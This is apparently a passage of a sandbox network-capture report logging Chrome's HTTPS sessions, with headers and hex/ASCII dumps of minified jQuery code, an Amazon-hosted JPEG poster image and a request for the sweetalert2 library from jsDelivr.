                                                                                                                                                                                          Data Ascii: n(){return this.pushStack(C.grep(this,function(t,e){return e%2}))},eq:function(t){var e=this.length,t=+t+(t<0?e:0);return this.pushStack(0<=t&&t<e?[this[t]]:[])},end:function(){return this.prevObject||this.constructor()},push:u,sort:e.sort,splice:e.splice
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1369INData Raw: 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 2d 31 3a 72 2e 63 61 6c 6c 28 65 2c 74 2c 6e 29 7d 2c 6d 65 72 67 65 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 2b 65 2e 6c 65 6e 67 74 68 2c 69 3d 30 2c 72 3d 74 2e 6c 65 6e 67 74 68 3b 69 3c 6e 3b 69 2b 2b 29 74 5b 72 2b 2b 5d 3d 65 5b 69 5d 3b 72 65 74 75 72 6e 20 74 2e 6c 65 6e 67 74 68 3d 72 2c 74 7d 2c 67 72 65 70 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 72 3d 30 2c 73 3d 74 2e 6c 65 6e 67 74 68 2c 61 3d 21 6e 3b 72 3c 73 3b 72 2b 2b 29 21 65 28 74 5b 72 5d 2c 72 29 21 3d 61 26 26 69 2e 70 75 73 68 28 74 5b 72 5d 29 3b 72 65 74 75 72 6e 20 69 7d 2c 6d 61 70 3a
                                                                                                                                                                                          Data Ascii: Array:function(t,e,n){return null==e?-1:r.call(e,t,n)},merge:function(t,e){for(var n=+e.length,i=0,r=t.length;i<n;i++)t[r++]=e[i];return t.length=r,t},grep:function(t,e,n){for(var i=[],r=0,s=t.length,a=!n;r<s;r++)!e(t[r],r)!=a&&i.push(t[r]);return i},map:
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1369INData Raw: 22 2a 28 3f 3a 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 7c 28 22 2b 46 2b 22 29 29 7c 29 22 2b 42 2b 22 2a 5c 5c 5d 22 2c 7a 3d 22 3a 28 22 2b 46 2b 22 29 28 3f 3a 5c 5c 28 28 28 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 29 7c 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 28 29 5b 5c 5c 5d 5d 7c 22 2b 48 2b 22 29 2a 29 7c 2e 2a 29 5c 5c 29 7c 29 22 2c 71 3d 6e 65 77 20 52 65 67 45 78 70 28 42 2b 22 2b 22 2c 22 67 22 29 2c 56 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 42 2b 22 2b 7c 28 28 3f 3a 5e 7c 5b 5e 5c 5c 5c 5c 5d 29 28 3f 3a 5c
                                                                                                                                                                                          Data Ascii: "*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+F+"))|)"+B+"*\\]",z=":("+F+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+H+")*)|.*)\\)|)",q=new RegExp(B+"+","g"),V=new RegExp("^"+B+"+|((?:^|[^\\\\])(?:\
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1369INData Raw: 3d 52 2e 63 61 6c 6c 28 76 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 76 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 65 5b 76 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 5d 2e 6e 6f 64 65 54 79 70 65 7d 63 61 74 63 68 28 74 29 7b 55 3d 7b 61 70 70 6c 79 3a 65 2e 6c 65 6e 67 74 68 3f 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 4d 2e 61 70 70 6c 79 28 74 2c 52 2e 63 61 6c 6c 28 65 29 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 74 2e 6c 65 6e 67 74 68 2c 69 3d 30 3b 74 5b 6e 2b 2b 5d 3d 65 5b 69 2b 2b 5d 3b 29 3b 74 2e 6c 65 6e 67 74 68 3d 6e 2d 31 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 74 2c 65 2c 6e 2c 69 29 7b 76 61 72 20 72 2c 73 2c 61 2c 6f 2c 75 2c 6c 2c 63 2c 68 3d 65 26 26 65 2e 6f 77 6e 65 72 44 6f 63 75 6d
                                                                                                                                                                                          Data Ascii: =R.call(v.childNodes),v.childNodes),e[v.childNodes.length].nodeType}catch(t){U={apply:e.length?function(t,e){M.apply(t,R.call(e))}:function(t,e){for(var n=t.length,i=0;t[n++]=e[i++];);t.length=n-1}}}function ot(t,e,n,i){var r,s,a,o,u,l,c,h=e&&e.ownerDocum
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1369INData Raw: 28 22 66 69 65 6c 64 73 65 74 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 21 21 74 28 65 29 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 21 31 7d 66 69 6e 61 6c 6c 79 7b 65 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 65 29 2c 65 3d 6e 75 6c 6c 7d 7d 66 75 6e 63 74 69 6f 6e 20 68 74 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 74 2e 73 70 6c 69 74 28 22 7c 22 29 2c 69 3d 6e 2e 6c 65 6e 67 74 68 3b 69 2d 2d 3b 29 5f 2e 61 74 74 72 48 61 6e 64 6c 65 5b 6e 5b 69 5d 5d 3d 65 7d 66 75 6e 63 74 69 6f 6e 20 64 74 28 74 2c 65 29 7b 76 61 72 20 6e 3d 65 26 26 74 2c 69 3d 6e 26 26 31 3d 3d 3d 74 2e 6e 6f 64 65 54 79 70 65 26 26 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 26 26 74 2e 73 6f 75 72 63
                                                                                                                                                                                          Data Ascii: ("fieldset");try{return!!t(e)}catch(t){return!1}finally{e.parentNode&&e.parentNode.removeChild(e),e=null}}function ht(t,e){for(var n=t.split("|"),i=n.length;i--;)_.attrHandle[n[i]]=e}function dt(t,e){var n=e&&t,i=n&&1===t.nodeType&&1===e.nodeType&&t.sourc
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1369INData Raw: 65 6c 64 73 65 74 20 64 69 76 22 29 2e 6c 65 6e 67 74 68 7d 29 2c 70 2e 61 74 74 72 69 62 75 74 65 73 3d 63 74 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 69 22 2c 21 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 63 6c 61 73 73 4e 61 6d 65 22 29 7d 29 2c 70 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3d 63 74 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6b 2e 63 72 65 61 74 65 43 6f 6d 6d 65 6e 74 28 22 22 29 29 2c 21 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 2a 22 29 2e 6c 65 6e 67 74 68 7d 29 2c 70 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 3d 74 74 2e 74 65 73 74 28
                                                                                                                                                                                          Data Ascii: eldset div").length}),p.attributes=ct(function(t){return t.className="i",!t.getAttribute("className")}),p.getElementsByTagName=ct(function(t){return t.appendChild(k.createComment("")),!t.getElementsByTagName("*").length}),p.getElementsByClassName=tt.test(
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1369INData Raw: 65 26 26 77 29 72 65 74 75 72 6e 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 74 29 7d 2c 6f 3d 5b 5d 2c 67 3d 5b 5d 2c 28 70 2e 71 73 61 3d 74 74 2e 74 65 73 74 28 6b 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 29 29 26 26 28 63 74 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3b 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 69 64 3d 27 22 2b 43 2b 22 27 3e 3c 2f 61 3e 3c 73 65 6c 65 63 74 20 69 64 3d 27 22 2b 43 2b 22 2d 5c 72 5c 5c 27 20 6d 73 61 6c 6c 6f 77 63 61 70 74 75 72 65 3d 27 27 3e 3c 6f 70 74 69 6f 6e 20 73 65 6c 65 63 74 65 64 3d 27 27 3e 3c 2f 6f 70 74 69 6f 6e 3e 3c 2f 73 65 6c 65 63 74 3e 22 2c 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c
                                                                                                                                                                                          Data Ascii: e&&w)return e.getElementsByClassName(t)},o=[],g=[],(p.qsa=tt.test(k.querySelectorAll))&&(ct(function(t){var e;a.appendChild(t).innerHTML="<a id='"+C+"'></a><select id='"+C+"-\r\\' msallowcapture=''><option selected=''></option></select>",t.querySelectorAl
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1369INData Raw: 6c 65 63 74 6f 72 7c 7c 61 2e 6f 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 61 2e 6d 73 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 29 29 26 26 63 74 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 70 2e 64 69 73 63 6f 6e 6e 65 63 74 65 64 4d 61 74 63 68 3d 63 2e 63 61 6c 6c 28 74 2c 22 2a 22 29 2c 63 2e 63 61 6c 6c 28 74 2c 22 5b 73 21 3d 27 27 5d 3a 78 22 29 2c 6f 2e 70 75 73 68 28 22 21 3d 22 2c 7a 29 7d 29 2c 67 3d 67 2e 6c 65 6e 67 74 68 26 26 6e 65 77 20 52 65 67 45 78 70 28 67 2e 6a 6f 69 6e 28 22 7c 22 29 29 2c 6f 3d 6f 2e 6c 65 6e 67 74 68 26 26 6e 65 77 20 52 65 67 45 78 70 28 6f 2e 6a 6f 69 6e 28 22 7c 22 29 29 2c 65 3d 74 74 2e 74 65 73 74 28 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 29 2c 79 3d 65 7c 7c 74 74
                                                                                                                                                                                          Data Ascii: lector||a.oMatchesSelector||a.msMatchesSelector))&&ct(function(t){p.disconnectedMatch=c.call(t,"*"),c.call(t,"[s!='']:x"),o.push("!=",z)}),g=g.length&&new RegExp(g.join("|")),o=o.length&&new RegExp(o.join("|")),e=tt.test(a.compareDocumentPosition),y=e||tt


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          6192.168.2.1649719151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:54 UTC461OUTGET /images/M/MV5BOTQ1NmFjMzEtNTkxYS00ZjY5LTgxN2UtMWM0NTlkZjc4MzNmL2ltYWdlL2ltYWdlXkEyXkFqcGdeQXVyMTQxNzMzNDI@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:55 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 32742
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 380c8ef3-3aac-45d1-88ee-8e20f09aba7f
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Sat, 17 Dec 2016 23:07:33 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Thu, 01 Dec 2044 16:05:47 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:55 GMT
                                                                                                                                                                                          Age: 761527
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200096-IAD, cache-ewr-kewr1740022-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 be 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 05 06 04 07 00 03 08 02 01 09 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 00 01 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 e3 2c cf b2 7c cc c9 33 33 24 c3 03 99
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5,|33$
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: b5 34 ad b3 61 55 12 30 c8 19 6f 85 27 52 d6 9d 0a 61 be 5f 8d 39 76 a7 2f d9 88 a2 f0 c6 04 6a 24 c5 3a 03 ed 03 e9 ca a8 a1 85 c1 f6 b4 1d 17 63 ca af 2d 53 b1 3d 5b 45 51 8b 2f d2 79 ff 00 93 6e 68 67 e9 b5 49 1a 06 b5 ec d6 a9 55 90 74 20 84 25 72 06 9a d2 d4 e8 d5 3f f3 8d 99 f2 e1 2b 40 d9 12 c6 62 d4 e5 d8 e2 37 73 16 da 47 1c b0 54 b9 ea f6 e4 3c 05 2b d2 cb 6d 0a 24 0d 9a 89 cb eb ae 48 fa 1c 62 4b 84 b3 54 72 29 5e 8e a1 ae 86 cb d3 3e 5f 8b b9 92 ea 6a 16 79 61 75 25 05 eb ce 64 66 66 64 9e fa 53 9a 3e c9 6e 2e 2e 96 3a 01 d5 dc cd d2 dd 3e 4f 4c 54 f3 85 e2 df f4 33 2d 85 8b a3 43 23 be a3 bf 2c fb f3 90 ba 8f 7f 2c e6 45 19 b3 9b b2 99 7c 5d c3 d3 2c 8b 09 d1 3a 15 f7 6f f2 8d a0 e7 0c 60 a4 ba 26 41 1f 2a d5 e4 de 97 e7 f8 61 6e 54 5b 85 c2
                                                                                                                                                                                          Data Ascii: 4aU0o'Ra_9v/j$:c-S=[EQ/ynhgIUt %r?+@b7sGT<+m$HbKTr)^>_jyau%dffdS>n..:>OLT3-C#,,E|],:o`&A*anT[
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 5d 3b 73 de b4 ae 74 bf e8 ad 9e 78 69 61 37 1d e4 73 4d 5d 65 c7 d5 12 c1 e8 f0 e9 da 24 9d 61 79 ed fd bb 6a 04 ea b5 fc 51 de b4 72 ae b7 1a 22 e0 4f 5e 6e a5 d1 60 76 1d 55 08 ad 9d 12 ce a3 65 f5 3c ad c4 8f 5c de 78 ba 3a 6b a7 56 1b d4 c9 c8 9d 1f 06 0c dd 01 e8 05 ec e9 32 b4 5d f4 cc 4b 61 9e a2 af ab b1 5d 22 b4 67 37 cf 5a f2 57 51 bc 14 e9 fb 62 ba d1 ca 53 2a 2b 22 8b 4c f9 67 a7 44 f7 14 cd 9c df 49 ba ba b1 90 75 73 ad 45 3a 9d d0 42 ce a5 c5 af bb 25 c0 ef 40 74 88 6f ad dd ab a6 04 b2 c6 a1 5d 20 92 69 df 32 a2 f4 78 b6 ab ef 36 de 59 7a 2c ee b5 43 6e 5e b9 3a b1 97 9e 74 60 f1 99 9b 38 d8 ea 95 22 4e ba e3 db ae 94 4e bc cc d8 ec 9f 3a ff 00 90 2c 90 72 b6 81 9b 58 a8 39 99 55 9f 7e 64 8d 33 92 30 1a c2 bd 98 4b cc cc ba cc cc 93 0f 80
                                                                                                                                                                                          Data Ascii: ];stxia7sM]e$ayjQr"O^n`vUe<\x:kV2]Ka]"g7ZWQbS*+"LgDIusE:B%@to] i2x6Yz,Cn^:t`8"NN:,rX9U~d30K
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: c0 1e 3a 46 33 b3 ec 43 2c 3c be 17 c9 11 cc 41 e0 eb 1d 74 65 df 82 cb c7 d3 63 a5 43 fd 97 f9 9a 3e 0c b9 b9 31 f5 d4 10 4f ea 72 9b 81 79 19 c7 f7 a7 e2 a6 65 78 e2 25 75 9b 22 61 29 d3 c1 86 cf b5 8f 80 7f ab 3a 70 da 4b 31 c6 88 96 62 f1 62 43 63 9b 40 45 af a6 93 f9 75 1c 11 4a 6d 65 2b c9 80 38 f5 00 23 a0 03 c6 35 1d d7 ae 66 59 dc 73 2d 68 07 ba 59 ed f3 37 35 35 3e 61 80 42 3c 4d 43 2b 1e 20 1b fd e2 d6 11 9c bf c8 0f 4b 4a 6e 26 b5 98 b5 e8 6c 99 69 d7 99 9b 61 82 f2 df 38 76 03 a8 9e 66 66 3f 35 20 dc 9c 09 13 1f c3 09 47 c4 61 2a fb 34 97 96 92 67 6e 70 f3 0d 5b d8 96 a6 a0 9f 30 42 22 8f d9 50 d7 99 ad fe c0 37 e8 a3 64 4e 08 aa d1 7a 70 76 96 d2 09 f3 5d 20 71 9a f4 b0 47 c7 ee 18 d8 68 26 15 6b cf 8c b4 8a fc c3 90 8c b3 2b 56 d8 da 5a e5
                                                                                                                                                                                          Data Ascii: :F3C,<AtecC>1Oryex%u"a):pK1bbCc@EuJme+8#5fYs-hY755>aB<MC+ KJn&lia8vff?5 Ga*4gnp[0B"P7dNzpv] qGh&k+VZ
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 47 4d 6c 75 e7 19 7f cc 6c 23 70 63 1f a4 81 5f 20 16 05 9a e4 22 09 8f d1 1f c7 3c ce c6 15 61 9b 33 ab dd 90 c7 f6 ef 53 0b ad 6d 7b 77 59 90 79 1d 3d e5 be 5c f2 33 11 05 4a 04 ba 94 be 8e 2d 8d 88 b8 cd cd 2e a1 58 f2 37 f4 0e 66 67 74 1a f1 e8 67 5e 94 7b 95 e4 63 4e 97 9e ec dd ab 37 35 e9 91 f8 99 8b b0 f2 fb f8 47 72 60 3e 98 37 8a f7 ca fe a1 63 cf aa cc 3f 14 e7 3a ef 9b 64 96 a7 8c 5f 4a 87 ba 74 ee 9b c7 8d b6 66 65 26 1b 2b 37 50 b1 9e d6 df ef ac c5 1c 88 8a 3d e2 0d cc 3c 8e 3e c8 ec 6a 6f bb 65 65 08 98 d7 b5 80 a9 eb b6 de 3d 87 a5 60 dc ad de 3d 3c fd d0 d1 1b 73 94 36 47 bb 7b 12 8f 1b 99 0f c8 cc 4a c3 a9 dd 89 db 3a f4 e9 6c 9a 26 75 32 80 02 6a b3 da 21 b7 57 f8 b9 b8 0d c2 7d c6 71 9d 33 03 bd f7 5a ac f0 6d 73 3a cb 5b 61 0c fe b5
                                                                                                                                                                                          Data Ascii: GMlul#pc_ "<a3Sm{wYy=\3J-.X7fgtg^{cN75Gr`>7c?:d_Jtfe&+7P=<>joee=`=<s6G{J:l&u2j!W}q3Zms:[a
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 58 fc 9a 31 e5 ed 35 da 47 b4 bd 46 bf 7a 57 70 71 b9 45 7d 9e 5a ba 95 bb 4d 33 17 b9 59 1e a2 19 44 5f ea 53 8a 6f ad b7 c6 b5 f6 cc 24 db cf a4 73 ca 2e 23 81 b9 f4 b6 4f a3 b6 7d 2d 90 62 bc ea 59 2a 07 13 eb 8d f9 88 97 eb 51 b2 3b 96 4c 9b cf 89 43 72 1a 3d b8 69 e5 35 2c 6d 2c e8 09 cf 25 9e 66 59 e3 d0 cb d3 97 b9 70 f2 b9 ae e1 01 fe 02 f1 8c c0 19 61 f1 2f 1a 73 e9 b9 be 5a 98 f5 99 4a ec f0 99 3f 6d 74 2b 5e 23 6d 5b 84 b0 b2 d5 9c 59 23 f5 07 5d c1 d4 9b 53 f5 8b 0f 89 6f 52 77 d8 8b d5 1c 09 9c ca c1 7f 66 27 e7 3e 66 28 1c 0c 61 f7 fc d2 ba 9a 10 c7 99 d6 f1 4f 1f f4 f0 e3 5d ad 33 32 3c ea 26 62 6b db dc e5 3c 98 13 b7 73 ac aa c2 27 28 f1 da 65 8f ee 6b d1 6a 1a f3 8d ae 24 4a 30 fb 1c 98 da dd d3 2c 27 51 f2 38 06 13 1e d2 78 d7 32 9f 93
                                                                                                                                                                                          Data Ascii: X15GFzWpqE}ZM3YD_So$s.#O}-bY*Q;LCr=i5,m,%fYpa/sZJ?mt+^#m[Y#]SoRwf'>f(aO]32<&bk<s'(ekj$J0,'Q8x2
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 9c c0 74 77 2d af 13 25 cb 35 38 38 d8 a5 ed 5b 2c 6c 9b 09 9d 52 f1 ed a1 7a 86 be c8 1d 40 eb 1a 95 3e 94 54 6e 60 a1 55 5b dc 6e a9 f2 0f bf e8 aa 98 b8 cb 45 a8 e0 00 c9 c0 37 4b a8 7c 26 5a a0 00 fd 6d 7b db 78 cb 3b 22 cc 3a 19 26 46 33 9b 6c e2 cd 6d 3e 6e bb 86 47 19 76 03 7d 3b a0 ed ab 9a 79 df d3 72 32 6c 67 2e 85 09 53 85 86 d9 6f c5 72 5e 9c 70 a8 71 5d ba 85 a1 5b aa db f5 38 dc e7 43 af 9e 55 72 ec 81 d8 ef 92 5f 21 e5 c0 63 d6 b8 c8 6a ad 7e db d4 d6 63 3e a6 36 27 d3 e6 29 5c 5a bb b6 aa 11 93 65 af da c6 b7 ed af 61 2f bb e8 94 8f 4b 8f 3a f1 9e 75 9f 9a 20 03 d3 1e b5 a2 ae 6e 7a 95 9b f1 8b 92 32 5c 23 db 5d 69 a9 89 45 36 92 0b 3f 8f b0 3a 85 8c c3 96 63 1f 91 fa 99 5f c2 dc bb b2 3c 4b 30 2e a9 3b 8d d3 f9 e5 5c 81 eb b4 5e 2e 2f 66
                                                                                                                                                                                          Data Ascii: tw-%588[,lRz@>Tn`U[nE7K|&Zm{x;":&F3lm>nGv};yr2lg.Sor^pq][8CUr_!cj~c>6')\Zea/K:u nz2\#]iE6?:c_<K0.;\^./f
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 80 a0 47 c9 63 b1 cb 76 c5 28 ae 9d 10 25 cd 5d 74 f9 63 62 07 c8 78 ce 0a 48 ee 36 6b 49 c2 02 94 6e 40 19 32 5c a4 92 2b 56 0c f3 15 0f 0b 23 15 62 ad 45 0e 79 0a 76 a5 fa ae c3 60 e3 07 b6 5d 5b 26 83 62 ad 6f 4c 4f 95 9e 7f 2a f2 c9 bb 9c 88 71 80 01 af 23 63 15 8c d5 ba 2a 2e cc ce ac c7 3f a7 82 c0 d3 f4 82 39 06 c7 41 90 58 f8 c8 ad 8a b6 69 ae ce 78 0e 18 53 65 78 3b ad 2c 81 bd 0a 32 10 0e 01 51 58 61 46 65 52 45 79 86 71 4b 2a ec 30 2e 16 9a 6c d3 48 8b 4b d4 01 e2 a4 92 30 32 24 8b 6f 52 a7 8f 92 f1 ea 99 21 8a d1 97 23 25 64 db fc 56 30 07 12 a9 68 d9 52 0e 9f 3a c6 e9 23 f4 d9 8a 85 0f d3 e5 6d 69 ac e7 3b 00 2d ee 01 35 e2 9b 20 d1 82 6e 2b 6a 69 89 ff 00 2f 94 a3 d2 cd b0 e0 b8 a9 65 47 5d 18 b7 25 0f 82 41 c9 10 bb 1d 54 05 8b 8a 8e 6c f6
                                                                                                                                                                                          Data Ascii: Gcv(%]tcbxH6kIn@2\+V#bEyv`][&boLO*q#c*.?9AXixSex;,2QXaFeREyqK*0.lHK02$oR!#%dV0hR:#mi;-5 n+ji/eG]%ATl
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: f6 c7 d5 5d 93 d8 6c 44 4e 79 93 ff 00 8b c9 18 be 72 6d 9e 90 e0 56 e6 a6 4d c3 69 9f 4c 89 61 92 4a 5d 25 c2 c7 24 61 70 00 e9 9e 8d 70 15 49 11 5d 17 f7 52 aa ca bb d1 b8 28 2a ef fd 27 06 e7 66 41 ef 02 bb 8c 4d ed 8d d8 66 b6 21 40 ac f1 5b f1 ee f2 5f f8 f2 aa c2 31 12 0e b3 4e e8 03 25 b5 c0 b8 c9 6b ab 81 0a 6d 4b 44 26 35 34 29 f6 83 94 68 f2 41 a3 18 61 86 36 91 37 b3 a7 44 6b b1 1a 9a 44 42 31 5d b4 a6 52 be c2 31 e2 a4 b6 8c c6 c2 55 1e 23 66 49 f4 f1 b9 1e 3f 70 ac fd b9 65 ba 45 63 da 79 da 68 52 43 0d f4 e9 e0 91 17 64 05 fc b7 70 5d bf 48 49 ce e2 6a 49 f9 da 16 3e 01 3d 08 cf 4d 54 96 58 d0 58 5f c5 34 7c 98 97 82 8c 05 5e d9 86 6e e0 11 16 3b 6a de d9 e3 81 d5 d0 2d b4 21 dd 5d 59 43 29 c0 7a 05 7c aa 3c 60 e2 57 23 c4 18 da 36 43 d0 63
                                                                                                                                                                                          Data Ascii: ]lDNyrmVMiLaJ]%$appI]R(*'fAMf!@[_1N%kmKD&54)hAa67DkDB1]R1U#fI?peEcyhRCdp]HIjI>=MTXX_4|^n;j-!]YC)z|<`W#6Cc
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 72 ab 30 09 6a a5 d9 1e 68 49 a1 d0 cd fa ac dd 31 12 69 e6 53 32 b8 bb 58 98 05 20 08 8a 7b c8 8f 65 ad 80 42 1d 19 0f 15 ff 00 24 37 83 70 d9 f4 be 67 19 0f 00 b6 8c 20 99 1a bd 00 1b b3 da 37 2f 2a ae f3 9e 77 7b 23 d5 79 75 66 13 aa e9 67 06 74 3c 22 9b 0d 04 66 e3 e0 9e d8 be 64 d0 00 9f 18 80 32 b6 89 e0 37 65 f3 53 c9 0c cd f9 a8 4a da b9 d1 ee 35 0c b9 dd 48 ce 57 46 f1 e7 40 17 4c 7d 9c 22 65 35 b7 22 0d 1d 16 a0 65 3c ce a9 55 7d 65 a2 7f 49 d5 45 ce 71 b2 d8 0e 73 2a eb 64 0f df 74 d4 cb 4c 5c 00 82 e8 b1 b9 cc ee e2 8c 72 30 6e 52 eb b2 dd cd 7a a7 40 6a 4a 99 0e a8 a4 11 e9 0b 00 65 cd 0e 9e d2 31 2b 6b 17 f0 12 55 60 97 8a 73 44 01 bc d4 69 28 2d 90 99 32 75 64 84 25 d1 e0 83 9d 0f 94 4c c7 55 1c 81 d0 6b 45 4a 9e 5d 8d ed 99 6c fe d2 03 90
                                                                                                                                                                                          Data Ascii: r0jhI1iS2X {eB$7pg 7/*w{#yufgt<"fd27eSJ5HWF@L}"e5"e<U}eIEqs*dtL\r0nRz@jJe1+kU`sDi(-2ud%LUkEJ]l


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          7192.168.2.1649718151.101.193.2294436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:54 UTC529OUTGET /npm/sweetalert2@11 HTTP/1.1
                                                                                                                                                                                          Host: cdn.jsdelivr.net
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
